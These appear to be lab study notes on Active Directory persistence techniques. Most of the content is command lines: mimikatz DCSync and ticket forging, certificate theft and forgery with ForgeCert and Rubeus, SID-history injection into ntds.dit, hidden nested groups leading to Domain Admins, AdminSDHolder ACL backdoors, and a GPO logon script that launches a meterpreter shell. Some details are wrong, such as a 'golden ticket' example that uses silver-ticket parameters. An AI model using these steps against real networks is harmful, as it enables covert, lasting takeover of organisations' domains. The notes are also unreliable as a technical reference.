In the Open
In the Open

Active Directory Persistance

Using Credentials

  • Knowledge Consistency Checker (KCC) replicates credentials through the forest
  • DC Synchronisation is the process of syncing credentials between domain controllers, it can be used to gather credentials
    • Credentials for multiple local administrators
    • Service account with delegation permissions
    • Service accounts with high AD permissions, Windows Server Update Services (WSUS), System Center Configuration Manager (SCCM)

Usage

  • Use mimikatz
lsadump::dcsync /domain:<domain> /user:<username>
  • To query the krbtgt user
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
  • Query everything
lsadump::dcsync /domain:<domain> /all

Using Tickets

  • Golden Ticket crafted TGT,

    • Needs domain name, domain SID and a user ID to impersonate
    • Needs krbtgt NTLM to sign the ticket
    • krbtgt hash never rotates automatically, only refreshed manually
    • krbtgt hash bypasses smart cards
    • TGT can not be older than 20 minutes
    • TGT lifetime can be set to years
    • TGT can be signed anywhere as long as the krbtgt hash is known

  • Silver Ticket crafted TGS

    • Signed by targeted service account on a host
    • DC is never contacted, no contact to any TGT or KDC
    • Non existing user can be used with a local admin group's SID

Usage

  • Craft a golden ticket
Get-ADDomain

kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt

Using Certificates

  • Private key extraction via mimikatz which makes it exportable
crypto::certificates /systemstore:local_machine
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /export
  • Password of the certificate is mimikatz afterwards
  • Use ForgeCert to create certificate
ForgeCert.exe --CaCertPath <domain>.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@<domain> --NewCertPath Administrator.pfx --NewCertPassword SecretPassword

* * Use Rubeus to request the TGT via

Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain> /dc:<IP of domain controller>
  • Load the TGT via mimikatz
privilege::debug
kerberos::ptt administrator.kirbi
dir \\<dc.example.com>\C$\

Using SID History

  • Account logs on -> associated SIDs (group SIDs) added to the user's token -> permissions are set in this way
  • SIDs of controlled accounts may be added to the history
  • Add Administrator group to the associated SIDs / the token
  • ntds.dit stores all AD info
  • User does not come up on checking groups, the user stays hidden unless searched for explicitly

Usage

  • Check SID history
Get-ADUser <your ad username> -properties sidhistory,memberof
  • Check SID of domain admins
Get-ADGroup "Domain Admins"

Stop-Service -Name ntds -force
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit 
Start-Service -Name ntds
  • Verify users SIDs
Get-ADUser <username> -Properties sidhistory 
dir \\<dc.example.com>\C$\

Using Group Memberships

  • Most are monitored security wise
  • Interesting group for persistence are
    • IT Support
    • Local administrational accounts
    • Groups with ownership over GPO
  • Nested groups are used to organize an AD
    • Helpdesk, Network Manager is a nested group of IT Support
  • Joining a nested groups is not as alerting as joining a more general group

Usage

  • Create a new subgroup
New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<username> Steam Network 1" -SamAccountName "<username>_steam_network1" -DisplayName "<username> Steam Network 1" -GroupScope Global -GroupCategory Security
  • And nesting another one
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security 

Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
  • Do it a couple of times again and add the last group to Domain Admins
Add-ADGroupMember -Identity "Domain Admins" -Members "<username>_2"
  • Add the low priv user to the first group
Add-ADGroupMember -Identity "<username>_steam_networks1" -Members "<low privileged username>"
  • And check
dir \\<domain>\c$\
  • Verify nested group
Get-ADGroupMember -Identity "Domain Admins"

Using ACLs

  • AD group templates like AdminSDHolder can be used to copy its ACL through the AD's protected groups
    • Domain Admins
    • Administrators
    • Enterprise/Schema Administrator
  • SDProp as a process maps the ACLs to protected groups every hour

Usage

  • runas /netonly /user:Administrator cmd.exe and therein open mmc
  • File -> Add Snap-In -> Active Directory Users and Groups
  • View -> Advanced Features
  • AdminSDHolder group in Domain -> System

  • Right click the group -> Properties -> Security -> Add user and Check Names -> OK -> Allow on Full Control -> Apply -> OK

  • Add the user to other groups with the new propagated permissions

Using GPOs

  • Restricted Group Memberships, admin access to every host in the domain
  • Logon Script Deployment, get a shell when a user logs in

Usage

  • Craft a portable executable shell via meterpreter
  • Craft a batch script
copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe && timeout /t 20 && C:\windows\tmp\shell.exe
  • Copy both to the sysvol
  • runas /netonly /user:Administrator cmd.exe and therein open mmc
  • File -> Add/Remove Snap-in -> Group Policy Management -> Add -> OK
  • Right click Admins OU -> Create GPO in the domain -> link it -> name it
  • Right click created policy -> Enforced
  • Right click created policy -> edit -> User Configuration / Policies -> Window Settings -> Scripts (logon/logoff)
  • Right click Logon -> Properties -> Scripts tab -> Add -> Browse
  • Select the previously created batch script and PE

  • Catch the shell when an admin logs on

  • Once again open mmc

  • Right click Enterprise Domain Controllers -> Edit settings, delete, modify security

  • Click on every other group except Authenticated Users and remove them

  • Add -> Domain Computers -> check names - OK

  • Read Permissions -> OK -> Authenticated Users -> Remove